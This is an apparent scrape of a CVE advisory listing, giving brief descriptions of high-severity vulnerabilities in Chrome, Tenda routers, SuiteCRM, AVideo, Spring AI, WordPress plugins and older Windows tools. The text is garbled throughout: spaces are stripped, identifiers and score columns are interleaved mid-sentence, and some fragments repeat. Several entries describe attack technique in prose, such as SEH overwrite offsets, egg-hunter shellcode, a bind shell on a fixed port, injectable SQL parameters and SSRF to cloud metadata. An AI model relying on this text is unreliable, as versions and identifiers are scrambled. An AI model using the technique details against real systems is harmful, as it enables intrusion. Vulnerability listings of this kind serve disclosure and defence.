More2026-file/goform/SetIpMacBind.Suchmanipulationoftheargumentlistleadstostack-basedbufferoverflow.Theattack 8.8 Details4491canbeexecutedremotely.Theexploithasbeendisclosedtothepublicandmaybeused. CVE-InappropriateimplementationinV8inGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8executearbitrarycodeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4447 CVE-AvulnerabilitywasfoundinTendaA18Pro02.03.02.28.TheaffectedelementisthefunctionsetqosMiblistof More2026-thefile/goform/formSetQosBand.Performingamanipulationoftheargumentlistresultsinstack-basedbuffer 8.8 Details4492overflow.Theattackispossibletobecarriedoutremotely.Theexploithasbeenmadepublicandcouldbeused. CVE-AnImproperInputValidationvulnerabilityinUniFiNetworkServermayallowunauthorizedaccesstoanaccountif More2026-theaccountownerissociallyengineeredintoclickingamaliciouslink.AffectedProducts:UniFiNetworkServer 8.8 Details22559(Version10.1.85andearlier)Mitigation:UpdateUniFiNetworkServertoVersion10.1.89orlater. KanboardisprojectmanagementsoftwarefocusedonKanbanmethodology.Priorto1.2.51,Kanboard'suserCVE-inviteregistrationendpoint(UserInviteController::register())acceptsallPOSTparametersandpassesthemto More2026- 8.8UserModel::create()withoutfilteringouttherolefield.Anattackerwhoreceivesaninvitelinkcaninject Details29056role=app-adminintheregistrationformtocreateanadministratoraccount.Version1.2.51fixestheissue. AvulnerabilitywasdeterminedinTendaA18Pro02.03.02.28.Theimpactedelementisthefunctionsub423B50CVE-ofthefile/goform/setMacFilterCfgofthecomponentMACFilteringConfigurationEndpoint.Executinga More2026- 8.8manipulationoftheargumentdeviceListcanleadtostack-basedbufferoverflow.Theattackmaybeperformed Details4493fromremote.Theexploithasbeenpubliclydisclosedandmaybeutilized. CVE-AvulnerabilitywasidentifiedinUTTHiPER1250GWupto3.2.7-210907-180535.Affectedisthefunctionstrcpyof More2026-thefile/goform/setSysAdm.SuchmanipulationoftheargumentGroupNameleadstobufferoverflow.Itispossible 8.8 Details4488tolaunchtheattackremotely.Theexploitispubliclyavailableandmightbeused. CVE- UseafterfreeinBaseinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentiallyexploit More 8.8heapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:Critical) Details

CVE- HeapbufferoverflowinCSSinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More CVE- HeapbufferoverflowinCSSinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More 8.8 Details CVE- HeapbufferoverflowinWebAudioinGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More 8.8 executearbitrarycodeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4443 CVE- DedeCMSv5.7.118wasdiscoveredtocontainaCross-SiteRequestForgery(CSRF)vulnerabilityin More2026- 8.8 /systaskadd.php. Details29839 CVE- UseafterfreeinWebRTCinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More2026- 8.8 Details4446 CVE- StackbufferoverflowinWebRTCinGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8 potentiallyexploitstackcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4444

CVE- Priortoversions7.15.1and8.9.3,anLDAPInjectionvulnerabilityexistsintheSuiteCRMauthenticationflow.The More2026- applicationfailstoproperlysanitizeuser-suppliedinputbeforeembeddingitintotheLDAPsearchfilter.By 8.8 Details33289 injectingLDAPcontrolcharacters,anunauthenticatedattackercanmanipulatethequerylogic,whichcanleadto authenticationbypassorinformationdisclosure.Versions7.15.1and8.9.3patchtheissue.

Priortoversions7.15.1and8.9.3,aSQLInjectionvulnerabilityexistsintheSuiteCRMauthenticationmechanismsCVE-whendirectorysupportisenabled.Theapplicationfailstoproperlysanitizetheuser-suppliedusernamebefore More2026- 8.8usingitinalocaldatabasequery.Anattackerwithvalid,low-privilegedirectorycredentialscanexploitthisto Details33288executearbitrarySQLcommands,leadingtocompleteprivilegeescalation(e.g.,logginginastheCRM Administrator).Versions7.15.1and8.9.3patchtheissue. Frigateisanetworkvideorecorder(NVR)withrealtimelocalobjectdetectionforIPcameras.Versionspriorto 0.17.0-beta1allowanyauthenticatedusertochangetheirownpasswordwithoutverifyingthecurrentpassword throughthe/users/{username}/passwordendpoint.ChangingapassworddoesnotinvalidateexistingJWTtokens,CVE-andthereisnovalidationofpasswordstrength.Ifanattackerobtainsavalidsessiontoken(e.g.,viaaccidentally More2026- 8.8exposedJWT,stolencookie,XSS,compromiseddevice,orsniffingoverHTTP),theycanchangethevictim’s Details33124passwordandgainpermanentcontroloftheaccount.SincepasswordchangesdonotinvalidateexistingJWT tokens,sessionhijackspersistevenafterapasswordreset.Additionally,thelackofpasswordstrengthvalidation exposesaccountstobrute-forceattacks.Thisissuehasbeenresolvedinversion0.17.0-beta1. CVE-OutofboundsreadandwriteinWebGLinGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8performarbitraryread/writeviaacraftedHTMLpage.(Chromiumsecurityseverity:Critical) Details4440 CVE-UseafterfreeinWebRTCinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More2026- 8.8 Details4445 Intakeisapackageforfinding,investigating,loadinganddisseminatingdata.Priortoversion2.0.9,theshell() CVE-syntaxwithinparameterdefaultvaluesappearstobeautomaticallyexpandedduringthecatalogparsingprocess. More2026-Ifacatalogcontainsaparameterdefaultsuchasshell(),thecommandmaybeexecutedwhenthe 8.8 Details33310catalogsourceisaccessed.ThismeansthatifauserloadsamaliciouscatalogYAML,embeddedcommandscould executeonthehostsystem.Version2.0.9mitigatestheissuebymakinggetshellFalsebydefaulteverywhere. Admidioisanopen-sourceusermanagementsolution.Versions5.0.6andbelowcontainacriticalunrestrictedfile uploadvulnerabilityintheDocuments&Filesmodule.DuetoadesignflawinhowCSRFtokenvalidationandfileCVE-extensionverificationinteractwithinUploadHandlerFile.php,anauthenticateduserwithuploadpermissionscan More2026- 8.8bypassfileextensionrestrictionsbyintentionallysubmittinganinvalidCSRFtoken.Thisallowstheuploadof Details32756arbitraryfiletypes,includingPHPscripts,whichmayleadtoRemoteCodeExecutionontheserver,resultinginfull servercompromise,dataexfiltration,andlateralmovement.Thisissuehasbeenfixedinversion5.0.7. PrecurioIntranetPortal4.4containsacross-siterequestforgeryvulnerabilitythatallowsattackerstoinduceCVE-authenticateduserstosubmitcraftedrequeststoaprofileupdateendpointhandlingfileuploads.Attackerscan More2026- 8.8exploitthistouploadexecutablefilestoweb-accessiblelocations,leadingtoarbitrarycodeexecutioninthe Details32989contextofthewebserver. TheLinksySearchandReplacepluginforWordPressisvulnerabletounauthorizedmodificationofdataduetoa CVE-missingcapabilitycheckonthe'linksysearchandreplaceitemdetails'functioninallversionsupto,and More2026-including,1.0.4.Thismakesitpossibleforauthenticatedattackers,withsubscriber-levelaccessandabove,to 8.8 Details2941updateanydatabasetable,anyvalue,includingthewpcapabilitiesdatabasefield,whichallowsattackersto changetheirownroletoadministrator,whichleadstoprivilegeescalation. CVE- 8.8HeapbufferoverflowinANGLEinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More Details exploitheapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details LDAPAccountManager(LAM)isawebfrontendformanagingentries(e.g.users,groups,DHCPsettings)storedin anLDAPdirectory.Priortoversion9.5,alocalfileinclusionwasdetectedinthePDFexportthatallowsuserstoCVE-includelocalPHPfilesandthiswayexecutecode.IncombinationwithGHSA-88hf-2cjm-m9g8thisallowsto More 8.8executearbitrarycode.UsersneedtologintoLAMtoexploitthisvulnerability.Version9.5fixestheissue. Details27894Althoughupgradingisrecommended,aworkaroundwouldbetomake/var/lib/ldap-account-manager/configread- onlyfortheweb-serveruseranddeletethePDFprofilefiles(makingPDFexportsimpossible). CVE- More2026-PrivilegeescalationintheIPCcomponent.ThisvulnerabilityaffectsFirefox<149andThunderbird<149. 8.8 Details4722 CVE-AcriticalSQLinjectionvulnerabilityinSpringAI'sMariaDBFilterExpressionConverterallowsattackerstobypass More2026-metadata-basedaccesscontrolsandexecutearbitrarySQLcommands.Thevulnerabilityexistsduetomissing 8.8 Details22730inputsanitization. Roxy-WIisawebinterfaceformanagingHaproxy,Nginx,ApacheandKeepalivedservers.Priortoversion8.2.6.3, CVE-acommandinjectionvulnerabilityexistsinthe/config/compare/ / /showendpoint,allowed More2026-authenticateduserstoexecutearbitrarysystemcommandsontheapphost.Thevulnerabilityexistsin 8.8 Details27811app/modules/config/config.pyonline362,whereuserinputisdirectlyformattedinthetemplatestringthatis eventuallyexecuted.Version8.2.6.3fixestheissue. CVE-TheTerrapacksoftware,fromASTERTEC/ASTERS.p.A.,withtheindicatedcomponentsandversionshasafile More2025-uploadvulnerabilitythatmayallowattackerstoexecutearbitrarycode.VulnerablecomponentsincludeTerrapack 8.8 Details67260TkWebCoreNG::1.0.20200914,TerrapackTKServerCGI2.5.4.150,andTerrapackTpkWebGISClient1.0.0.

CVE- to8.0.0.2,astoredcross-sitescripting(XSS)vulnerabilityinthepatientportalpaymentflowallowsapatient More2026- portalusertopersistarbitraryJavaScriptthatexecutesinthebrowserofastaffmemberwhoreviewsthe 8.7 Details33346 paymentsubmission.Thepayloadisstoredviaportal/lib/paylib.phpandrenderedwithoutescapingin portal/portal_payment.php.Version8.0.0.2fixestheissue. Versionsofthepackagejsrsasignbefore11.1.1arevulnerabletoMissingCryptographicStepviatheCVE- KJUR.crypto.DSA.signWithMessageHashprocessintheDSAsigningimplementation.Anattackercanrecoverthe More2026- 8.7 privatekeybyforcingrorstobezero,sothelibraryemitsaninvalidsignaturewithoutretrying,andthensolves Details4601 forxfromtheresultingsignature. Budibaseisalowcodeplatformforcreatinginternaltools,workflows,andadminpanels.Inversionsfrom3.30.6 andprior,theRESTdatasourcequerypreviewendpoint(POST/api/queries/preview)makesserver-sideHTTP CVE- requeststoanyURLsuppliedbytheuserinfields.pathwithnovalidation.Anauthenticatedadmincanreach More2026- internalservicesthatarenotexposedtotheinternet—includingcloudmetadataendpoints(AWS/GCP/Azure), 8.7 Details33226 internaldatabases,KubernetesAPIs,andotherpodsontheinternalnetwork.OnGCPthisleadstoOAuth2token theftwithcloud-platformscope(fullGCPaccess).Onanydeploymentitenablesfullinternalnetworkenumeration. Attimeofpublication,therearenopubliclyavailablepatches. StatamicisaLaravelandGitpoweredcontentmanagementsystem(CMS).Priortoversions5.73.14and6.7.0,aCVE- storedXSSvulnerabilityinSVGassetreuploadsallowsauthenticateduserswithassetuploadpermissionsto More2026- 8.7 bypassSVGsanitizationandinjectmaliciousJavaScriptthatexecuteswhentheassetisviewed.Thishasbeen Details33172 fixedin5.73.14and6.7.0. CVE- Connect-CMSisacontentmanagementsystem.Inversions1.35.0through1.41.0and2.35.0through2.41.0,a More2026- DOM-basedCross-SiteScripting(XSS)issueexistsintheCabinetPluginlistview.Versions1.41.1and2.41.1 8.7 Details32277 ImproperRestrictionofXMLExternalEntityReferencevulnerabilityinXMLUtils.javainSlovensko.DigitalAutogram CVE- allowsremoteunauthenticatedattackertoconductSSRF(ServerSideRequestForgery)attacksandobtain More2026- unauthorizedaccesstolocalfilesonfilesystemsrunningthevulnerableapplication.Successfulexploitation 8.6 Details3511 requiresthevictimtovisitaspeciallycraftedwebsitethatsendsrequestcontainingaspeciallycraftedXML documentto/signendpointofthelocalHTTPserverrunbytheapplication. OpenNeuralNetworkExchange(ONNX)isanopenstandardformachinelearninginteroperability.Inversionsup toandincluding1.20.1,asecuritycontrolbypassexistsinonnx.hub.load()duetoimproperlogicintherepository trustverificationmechanism.Whilethefunctionisdesignedtowarnuserswhenloadingmodelsfromnon-officialCVE- sources,theuseofthesilent=Trueparametercompletelysuppressesallsecuritywarningsandconfirmation More2026- 8.6 prompts.Thisvulnerabilitytransformsastandardmodel-loadingfunctionintoavectorforZero-InteractionSupply- Details28500 ChainAttacks.Whenchainedwithfile-systemvulnerabilities,anattackercansilentlyexfiltratesensitivefiles(SSH keys,cloudcredentials)fromthevictim'smachinethemomentthemodelisloaded.Asoftimeofpublication,no knownpatchedversionsareavailable. CVE- ExposureofsensitiveinformationtoanunauthorizedactorinAzureDataFactoryallowsanunauthorizedattacker More 8.6 todiscloseinformationoveranetwork. Details23659

Allure2istheversion2.xbranchofAllureReport,amulti-languagetestreportingtool.TheAllurereportgenerator

CVE- priortoversion2.38.0isvulnerabletoanarbitraryfilereadviapathtraversalwhenprocessingtestresults.An More attackercancraftamaliciousresultfile(-result.json,-container.json,or.plist)thatpointsanattachmentsourceto 8.6 Details33166 asensitivefileonthehostsystem.Duringreportgeneration,Allurewillresolvethesepathsandincludethe sensitivefilesinthefinalreport.Version2.38.0fixestheissue. Kanisanopen-sourceprojectmanagementtool.Inversions0.5.4andbelow,the/api/download/attatchment endpointhasnoauthenticationandnoURLvalidation.TheAttachmentDownloadendpointacceptsauser-CVE- suppliedURLqueryparameterandpassesitdirectlytofetch()server-side,andreturnsthefullresponsebody.An More2026- 8.6 unauthenticatedattackercanusethistomakeHTTPrequestsfromtheservertointernalservices,cloudmetadata Details32255 endpoints,orprivatenetworkresources.Thisissuehasbeenfixedinversion0.5.5.Toworkaroundthisissue, blockorrestrictaccessto/api/download/attatchmentatthereverseproxylevel(nginx,Cloudflare,etc.). Free5GCisanopen-sourceLinuxFoundationprojectfor5thgeneration(5G)mobilecorenetworks.Versionsprior to1.4.2arevulnerabletonullbyteinjectioninURLpathparameters.Aremoteattackercaninjectnullbytes(URL- encodedas%00)intothesupipathparameteroftheUDM'sNudmSubscriberDataManagementAPI.ThiscausesCVE- URLparsingfailureinGo'snet/urlpackagewiththeerror"invalidcontrolcharacterinURL",resultingina500 More2026- 8.6 InternalServerError.Thisnullbyteinjectionvulnerabilitycanbeexploitedfordenialofserviceattacks.Whenthe Details33191 supiparametercontainsnullcharacters,theUDMattemptstoconstructaURLforUDRthatincludesthesecontrol characters.Go'sURLparserrejectsthem,causingtherequesttofailwith500insteadofproperlyvalidatinginput andreturning400BadRequest.Thisissuehasbeenfixedinversion1.4.2. CVE- Server-siderequestforgery(ssrf)inMicrosoftPurviewallowsanunauthorizedattackertoelevateprivilegesovera More2026- 8.6 network. Details26138 CVE- Server-siderequestforgery(ssrf)inMicrosoftPurviewallowsanunauthorizedattackertoelevateprivilegesovera More2026- 8.6 network. Details26139 WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,theisSSRFSafeURL() CVE- functioninAVideocanbebypassedusingIPv4-mappedIPv6addresses(::ffff:x.x.x.x).Theunauthenticated More2026- plugin/LiveLinks/proxy.phpendpointusesthisfunctiontovalidateURLsbeforefetchingthemwithcurl,butthe 8.6 Details33480 IPv4-mappedIPv6prefixpassesallchecks,allowinganattackertoaccesscloudmetadataservices,internal networks,andlocalhostservices.Commit75ce8a579a58c9d4c7aafe453fbced002cb8f373containsapatch. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,anunauthenticatedAPI endpoint(APIName=locale)concatenatesuserinputintoanincludepathwithnocanonicalizationorwhitelist.CVE- Pathtraversalisaccepted,soarbitraryPHPfilesunderthewebrootcanbeincluded.Inourtestthisyielded More2026- 8.6 confirmedfiledisclosureandcodeexecutionofexistingPHPcontent(e.g.,view/about.php),anditcan Details33513 escalatetoRCEifanattackercanplaceorcontrolaPHPfileelsewhereinthetree.Asoftimeofpublication,no patchedversionsareavailable. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,theCDNpluginendpoints plugin/CDN/status.json.phpandplugin/CDN/disable.json.phpusekey-basedauthenticationwithanemptyCVE- stringdefaultkey.WhentheCDNpluginisenabledbutthekeyhasnotbeenconfigured(thedefaultstate),the More2026- 8.6 keyvalidationcheckiscompletelybypassed,allowinganyunauthenticatedattackertomodifythefullCDN Details33719 configuration—includingCDNURLs,storagecredentials,andtheauthenticationkeyitself—viamass-assignment throughtheparrequestparameter.Commitadeff0a31ba04a56f411eef256139fd7ed7d4310containsapatch. WWBNAVideoisanopensourcevideoplatform.Inversions25.0andbelow,theplugin/LiveLinks/proxy.php CVE- endpointvalidatesuser-suppliedURLsagainstinternal/privatenetworksusingisSSRFSafeURL(),butonlychecks More2026- theinitialURL.WhentheinitialURLrespondswithanHTTPredirect(Locationheader),theredirecttargetis 8.6 Details33039 fetchedviafakeBrowser()withoutre-validation,allowinganattackertoreachinternalservices(cloudmetadata, RFC1918addresses)throughanattacker-controlledredirect.Thisissueisfixedinversion26.0. CVE- InsufficientlyprotectedcredentialsinAzureDevOpsallowsanunauthorizedattackertoelevateprivilegesovera More2026- 8.6 network. Details23658 VulnerabilityinSpringCloudwhensubstitutingtheprofileparameterfromarequestmadetotheSpringCloudCVE- ConfigServerconfiguredtothenativefilesystemasabackend,becauseitwaspossibletoaccessfilesoutsideof More2026- 8.6 theconfiguredsearchdirectories.ThisissueaffectsSpringCloud:from3.1.Xbefore3.1.13,from4.1.Xbefore Details22739 4.1.9,from4.2.Xbefore4.2.3,from4.3.Xbefore4.3.2,from5.0.Xbefore5.0.2. LuCIistheOpenWrtConfigurationInterface.Versionspriortoboth24.10.5and25.12.0,containastoredXSS vulnerabilityinthewirelessscanmodal,whereSSIDvaluesfromscanresultsarerenderedasrawHTMLwithout anysanitization.Thewireless.jsfileintheluci-mod-networkpackagepassesSSIDsviaatemplateliteralto CVE- dom.append(),whichprocessesthemthroughinnerHTML,allowinganattackertocraftamaliciousSSID More2026- 8.6 containingarbitraryHTML/JavaScript.Exploitationrequirestheusertoactivelyopenthewirelessscanmodal(e.g., Details32721 toconnecttoaWi-Fiaccesspointorsurveynearbychannels),andonlyaffectsOpenWrtversionsnewerthan 23.05/22.03uptothepatchedreleases(24.10.6and25.12.1).TheissuehasbeenfixedinversionLuCI 26.072.65753~068150b. CVE- Sandboxescapeduetoincorrectboundaryconditions,integeroverflowintheXPCOMcomponent.This More vulnerabilityaffectsFirefox<149,FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,and 8.6 vulnerabilityaffectsFirefox<149,FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,and 8.6 Details Thunderbird<140.9. AJSONPathinjectionvulnerabilityinSpringAI'sAbstractFilterExpressionConverterallowsauthenticatedusersto bypassmetadata-basedaccesscontrolsthroughcraftedfilterexpressions.User-controlledinputpassedto FilterExpressionBuilderisconcatenatedintoJSONPathquerieswithoutproperescaping,enablingattackerstoCVE- injectarbitraryJSONPathlogicandaccessunauthorizeddocuments.Thisvulnerabilityaffectsapplicationsusing More2026- 8.6 vectorstoresthatextendAbstractFilterExpressionConverterformulti-tenantisolation,role-basedaccesscontrol, Details22729 ordocumentfilteringbasedonmetadata.Thevulnerabilityoccurswhenuser-suppliedvaluesinfilterexpressions arenotescapedbeforebeinginsertedintoJSONPathqueries.Specialcharacterslike",||,and&&arepassed throughunescaped,allowinginjectionofarbitraryJSONPathlogicthatcanaltertheintendedquerysemantics. CVE- SandboxescapeduetoincorrectboundaryconditionsintheTelemetrycomponent.Thisvulnerabilityaffects More2026- 8.6 Firefox<149,FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. Details4687 MariaDBserverisacommunitydevelopedforkofMySQLserver.AnauthenticatedusercancrashMariaDB CVE- versions11.4before11.4.10and11.8before11.8.6viaabuginJSONSCHEMAVALID()function.Undercertain More2026- conditionsitmightbepossibletoturnthecrashintoaremotecodeexecution.Theseconditionsrequiretight 8.5 Details32710 controlovermemorylayoutwhichisgenerallyonlyattainableinalabenvironment.ThisissueisfixedinMariaDB 11.4.10,MariaDB11.8.6,andMariaDB12.2.2. IperiusBackup6.1.0containsaprivilegeescalationvulnerabilitythatallowslow-privilegeuserstoexecute CVE- arbitraryprogramswithelevatedprivilegesbycreatingbackupjobs.Attackerscanconfigurebackupjobsto More2019- executemaliciousbatchfilesorprogramsbeforeorafterbackupoperations,whichrunwiththeprivilegesofthe 8.4 Details25608 IperiusBackupServiceaccount(LocalSystemorAdministrator),enablingprivilegeescalationandarbitrarycode execution. FlexHEX2.71containsalocalbufferoverflowvulnerabilityintheStreamNamefieldthatallowslocalattackerstoCVE- executearbitrarycodebytriggeringastructuredexceptionhandler(SEH)overflow.Attackerscancrafta More2019- 8.4 malicioustextfilewithcarefullyalignedshellcodeandSEHchainpointers,pastethecontentsintotheStream Details25627 Namedialog,andexecutearbitrarycommandslikecalc.exewhentheexceptionhandleristriggered. LavavoCDRipper4.20containsastructuredexceptionhandling(SEH)bufferoverflowvulnerabilitythatallowsCVE- localattackerstoexecutearbitrarycodebysupplyingamaliciousstringintheLicenseActivationNamefield. More2019- 8.4 Attackerscancraftapayloadwithcontrolledbufferdata,NSEHjumpinstructions,andSEHhandleraddressesto Details25615 triggercodeexecutionandestablishabindshellonport3110. Base64Decoder1.1.2containsastack-basedbufferoverflowvulnerabilitythatallowslocalattackerstoexecuteCVE- arbitrarycodebytriggeringastructuredexceptionhandler(SEH)overwrite.Attackerscancraftamaliciousinput More2019- 8.4 filethatoverflowsabuffer,overwritestheSEHchainwithaPOP-POP-RETgadgetaddress,andusesanegghunter Details25634 payloadtolocateandexecuteshellcodeforcodeexecution. AIDA64Extreme5.99.4900containsastructuredexceptionhandlingbufferoverflowvulnerabilitythatallowslocalCVE- attackerstoexecutearbitrarycodebysupplyingmaliciousinputthroughtheemailpreferencesandreportwizard More2019- 8.4 interfaces.AttackerscaninjectcraftedpayloadsintotheDisplaynamefieldandLoadfromfileparameterto Details25633 triggertheoverflowandexecuteshellcodewithapplicationprivileges. CVE- Axessh4.2containsastack-basedbufferoverflowvulnerabilityinthelogfilenamefieldthatallowslocalattackers More2019- toexecutearbitrarycodebysupplyinganexcessivelylongfilename.Attackerscanoverflowthebufferatoffset 8.4 Details25607 214bytestooverwritetheinstructionpointerandexecuteshellcodewithsystemprivileges. AIDA64Business5.99.4900containsastructuredexceptionhandlingbufferoverflowvulnerabilitythatallowslocalCVE- attackerstoexecutearbitrarycodebyoverwritingSEHpointerswithmaliciousshellcode.Attackerscaninjectegg More2019- 8.4 huntershellcodethroughtheSMTPdisplaynamefieldinpreferencesorreportwizardfunctionalitytotriggerthe Details25631 overflowandexecutecodewithapplicationprivileges. AIDA64Extreme5.99.4900containsastructuredexceptionhandlerbufferoverflowvulnerabilityintheloggingCVE- functionalitythatallowslocalattackerstoexecutearbitrarycodebysupplyingamaliciousCSVlogfilepath. More2019- 8.4 AttackerscaninjectshellcodethroughtheHardwareMonitoringloggingpreferencestooverflowthebufferand Details25629 triggercodeexecutionwhentheapplicationprocessesthelogfilepath. X-NetStatPro5.63containsalocalbufferoverflowvulnerabilitythatallowslocalattackerstoexecutearbitraryCVE- codebyoverwritingtheEIPregisterthrougha264-bytebufferoverflow.Attackerscaninjectshellcodeinto More2019- 8.4 memoryanduseanegghuntertechniquetolocateandexecutethepayloadwhentheapplicationprocesses Details25637 maliciousinputthroughHTTPClientorRulesfunctionality. TuneClone2.20containsastructuredexceptionhandler(SEH)bufferoverflowvulnerabilitythatallowslocal CVE- attackerstoexecutearbitrarycodebysupplyingamaliciouslicensecodestring.Attackerscancraftapayload More2019- 8.4 withacontrolledbuffer,NSEHjumpinstruction,andSEHhandleraddresspointingtoaROPgadget,thenpasteit Details25603 intothelicensecodefieldtotriggercodeexecutionandestablishabindshell. FTPShellServer6.83containsabufferoverflowvulnerabilityinthe'Accountnametoban'fieldthatallowslocalCVE- attackerstoexecutearbitrarycodebysupplyingacraftedstring.Attackerscaninjectshellcodethroughthe More accountnameparameterintheManageFTPAccountsdialogtooverwritethereturnaddressandexecutecalc.exe Details 8.4 orothercommands.25619 orothercommands.25619 RiverPastCamDo3.7.6containsalocalbufferoverflowvulnerabilityintheactivationcodeinputfieldthatallowsCVE- localattackerstoexecutearbitrarycodebysupplyingamaliciousactivationcodestring.Attackerscancrafta More 8.4 buffercontaining608bytesofjunkdatafollowedbyshellcodeandSEHchainoverwritevaluestotriggercode Details25626 executionwhentheactivationdialogprocessestheinput. DVDXPlayerPro5.5containsalocalbufferoverflowvulnerabilitywithstructuredexceptionhandlingthatallowsCVE- localattackerstoexecutearbitrarycodebycraftingmaliciousplaylistfiles.Attackerscancreateaspecially More2019- 8.4 crafted.plffilecontainingshellcodeandNOPsledsthatoverflowsabufferandhijackstheSEHchaintoexecute Details25604 arbitrarycodewithapplicationprivileges. cgltfversion1.15andpriorcontainanintegeroverflowvulnerabilityinthecgltfvalidate()functionwhen CVE- validatingsparseaccessorsthatallowsattackerstotriggerout-of-boundsreadsbysupplyingcraftedglTF/GLB More2026- inputfileswithattacker-controlledsizevalues.Attackerscanexploituncheckedarithmeticoperationsinsparse 8.4 Details32845 accessorvalidationtocauseheapbufferover-readsincgltfcalcindexbound(),resultingindenialofservice crashesandpotentialmemorydisclosure. JetAudiojetCastServer2.0containsastack-basedbufferoverflowvulnerabilityintheLogDirectoryconfigurationCVE- fieldthatallowslocalattackerstooverwritestructuredexceptionhandlingpointers.Attackerscaninject More2019- 8.4 alphanumericencodedshellcodethroughtheLogDirectoryfieldtotriggeranSEHexceptionhandlerandexecute Details25609 arbitrarycodewithapplicationprivileges. MiniFtpcontainsabufferoverflowvulnerabilityintheparseconfloadsettingfunctionthatallowslocalattackersCVE- toexecutearbitrarycodebysupplyingoversizedconfigurationvalues.Attackerscancraftaminiftpd.conffilewith More2019- 8.4 valuesexceeding128bytestooverflowstackbuffersandoverwritethereturnaddress,enablingcodeexecution Details25611 withrootprivileges. CVE- ImpropercertificatevalidationinDevolutionsHubReportingService2025.3.1.1andearlierallowsanetwork More2026- 8.3 attackertoperformaman-in-the-middleattackviadisabledTLScertificateverification. Details4396 TheMimeTypesLinkIconspluginforWordPressisvulnerabletoServer-SideRequestForgeryinallversionsupto, andincluding,3.2.20.ThisisduetothepluginmakingoutboundHTTPrequeststouser-controlledURLswithoutCVE- propervalidationwhenthe"Showfilesize"optionisenabled.Thismakesitpossibleforauthenticatedattackers, More2026- 8.3 withContributor-levelaccessandabove,tomakewebrequeststoarbitrarylocationsoriginatingfromtheweb Details1313 applicationandcanbeusedtoqueryandmodifyinformationfrominternalservicesviacraftedlinksinpost content. CVE- More2026- versionsonthe2.xseriesuptoandincluding2.41.0,aStoredCross-siteScripting(XSS)issueexistsinthefile 8.2 Details32278 fieldoftheFormPlugin.Versions1.41.1and2.41.1containapatch. eNdonesiaPortalv8.7containsmultipleSQLinjectionvulnerabilitiesthatallowunauthenticatedattackerstoCVE- executearbitrarySQLqueriesbyinjectingmaliciouscodethroughthebidparameter.AttackerscansendGET More2019- 8.2 requeststobanners.phpwithcraftedSQLpayloadsinthebidparametertoextractsensitivedatabaseinformation Details25643 fromtheINFORMATIONSCHEMAtables. oRPCisantoolthathelpsbuildAPIsthatareend-to-endtype-safeandadheretoOpenAPIstandards.Priorto CVE- version1.13.9,astoredcross-sitescripting(XSS)vulnerabilityexistsintheOpenAPIdocumentationgenerationof More2026- orpc.IfanattackercancontrolanyfieldwithintheOpenAPIspecification(suchasinfo.description),theycanbreak 8.2 Details33331 outoftheJSONcontextandexecutearbitraryJavaScriptwhenauserviewsthegeneratedAPIdocumentation. Thisissuehasbeenpatchedinversion1.13.9. ZeewaysMatrimonyCMScontainsmultipleSQLinjectionvulnerabilitiesthatallowunauthenticatedattackerstoCVE- manipulatedatabasequeriesthroughtheprofilelistendpoint.AttackerscaninjectSQLcodeviatheupcast, More2019- 8.2 smother,andsreligionparameterstoextractsensitivedatabaseinformationusingtime-basedorerror-based Details25635 techniques. phpTransformer2016.9containsanSQLinjectionvulnerabilitythatallowsremoteattackerstoexecutearbitraryCVE- SQLqueriesbyinjectingmaliciouscodethroughtheidnewsparameter.AttackerscansendcraftedGETrequests More2019- 8.2 toGeneratePDF.phpwithSQLpayloadsintheidnewsparametertoextractsensitivedatabaseinformationor Details25578 manipulatequeries. SpringBootapplicationswithActuatorcanbevulnerabletoan"AuthenticationBypass"vulnerabilitywhenanCVE- applicationendpointthatrequiresauthenticationisdeclaredunderthepathusedbytheCloudFoundryActuator More2026- 8.2 endpoints.ThisissueaffectsSpringSecurity:from4.0.0through4.0.3,from3.5.0through3.5.11,from3.4.0 Details22733 through3.4.14,from3.3.0through3.3.17,from2.7.0through2.7.31. Kyselyisatype-safeTypeScriptSQLquerybuilder.Versionsuptoandincluding0.28.11hasaSQLinjection vulnerabilityinJSONpathcompilationforMySQLandSQLitedialects.ThevisitJSONPathLeg()functionappends user-controlledvaluesfrom.key()and.at()directlyintosingle-quotedJSONpathstringliterals('$.key')CVE- More withoutescapingsinglequotes.AnattackercanbreakoutoftheJSONpathstringcontextandinjectarbitrarySQL. 8.2 Details ThisisinconsistentwithsanitizeIdentifier(),whichproperlydoublesdelimitercharactersforidentifiers—both32763 arenon-parameterizableSQLconstructsrequiringmanualescaping,butonlyidentifiersareprotected.Version 0.28.12fixestheissue. 0.28.12fixestheissue. KeplerWallpaperScript1.1containsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoCVE- executearbitrarySQLqueriesbyinjectingmaliciouscodeintothecategoryparameter.AttackerscansendGET More 8.2 requeststothecategoryendpointwithURL-encodedSQLUNIONstatementstoextractdatabaseinformation Details25576 includingusernames,databasenames,andMySQLversiondetails. ZeewaysJobsiteCMScontainsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstomanipulateCVE- databasequeriesbyinjectingSQLcodethroughthe'id'GETparameter.Attackerscansendcraftedrequeststo More2019- 8.2 newsdetails.php,jobsdetails.php,orjobcmpdetails.phpwithmalicious'id'valuesusingGROUPBYandCASE Details25636 statementstoextractsensitivedatabaseinformation. ownDMS4.7containsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoexecutearbitraryCVE- 